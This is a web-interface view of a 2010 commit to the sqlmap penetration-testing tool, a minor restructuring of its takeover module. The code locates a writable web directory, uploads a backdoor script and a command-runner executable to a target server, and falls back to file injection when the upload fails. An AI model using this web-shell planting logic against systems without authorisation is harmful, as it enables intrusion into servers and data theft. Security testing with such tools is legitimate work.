sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-05-09 18:23:45 +03:00
Code Issues Packages Projects Releases Wiki Activity

Minor bug fix and code adjustments

Browse Source
This commit is contained in:
Bernardo Damele 2010-02-25 14:06:44 +00:00
parent a0f5c3d885
commit 0df5b5fed9
1 changed files with 21 additions and 13 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

32
lib/takeover/web.py
View File

@ -203,33 +203,41 @@ class Web:
runcmdName = "tmpe%s.exe" % randomStr(4) runcmdName = "tmpe%s.exe" % randomStr(4)
runcmdStream = decloakToNamedTemporaryFile(os.path.join(paths.SQLMAP_SHELL_PATH, 'runcmd.exe_'), runcmdName) runcmdStream = decloakToNamedTemporaryFile(os.path.join(paths.SQLMAP_SHELL_PATH, 'runcmd.exe_'), runcmdName)
match = re.search(r'input type=hidden name=scriptsdir value="([^"]+)"', uplPage) match = re.search(r'input type=hidden name=scriptsdir value="([^"]+)"', uplPage)
if match: if match:
backdoorDirectory = match.group(1) backdoorDirectory = match.group(1)
else: else:
continue continue
backdoorContent = originalBackdoorContent.replace("WRITABLE_DIR", backdoorDirectory).replace("RUNCMD_EXE", runcmdName) backdoorContent = originalBackdoorContent.replace("WRITABLE_DIR", backdoorDirectory).replace("RUNCMD_EXE", runcmdName)
backdoorStream.file.truncate() backdoorStream.file.truncate()
backdoorStream.read() backdoorStream.read()
backdoorStream.seek(0) backdoorStream.seek(0)
backdoorStream.write(backdoorContent) backdoorStream.write(backdoorContent)
if self.__webFileStreamUpload(backdoorStream, backdoorName, backdoorDirectory): if self.__webFileStreamUpload(backdoorStream, backdoorName, backdoorDirectory):
self.__webFileStreamUpload(runcmdStream, runcmdName, backdoorDirectory) self.__webFileStreamUpload(runcmdStream, runcmdName, backdoorDirectory)
self.webBackdoorUrl = "%s/Scripts/%s" % (self.webBaseUrl.rstrip('/'), backdoorName) self.webBackdoorUrl = "%s/Scripts/%s" % (self.webBaseUrl.rstrip('/'), backdoorName)
self.webDirectory = backdoorDirectory self.webDirectory = backdoorDirectory
else: else:
continue continue
elif not self.__webFileStreamUpload(backdoorStream, backdoorName, posixToNtSlashes(directory) if kb.os == "Windows" else directory):
warnMsg = "backdoor hasn't been successfully uploaded " else:
warnMsg += "with uploader probably because of permission " if not self.__webFileStreamUpload(backdoorStream, backdoorName, posixToNtSlashes(directory) if kb.os == "Windows" else directory):
warnMsg += "issues." warnMsg = "backdoor hasn't been successfully uploaded "
logger.warn(warnMsg) warnMsg += "with uploader probably because of permission "
message = "do you want to try the same method used " warnMsg += "issues."
message += "for uploader? [y/N] " logger.warn(warnMsg)
getOutput = readInput(message, default="N")
if getOutput in ("y", "Y"): message = "do you want to try the same method used "
self.__webFileInject(backdoorContent, backdoorName, directory) message += "for uploader? [y/N] "
else: getOutput = readInput(message, default="N")
continue
if getOutput in ("y", "Y"):
self.__webFileInject(backdoorContent, backdoorName, directory)
else:
continue
self.webBackdoorUrl = "%s/%s" % (self.webBaseUrl, backdoorName) self.webBackdoorUrl = "%s/%s" % (self.webBaseUrl, backdoorName)
self.webDirectory = directory self.webDirectory = directory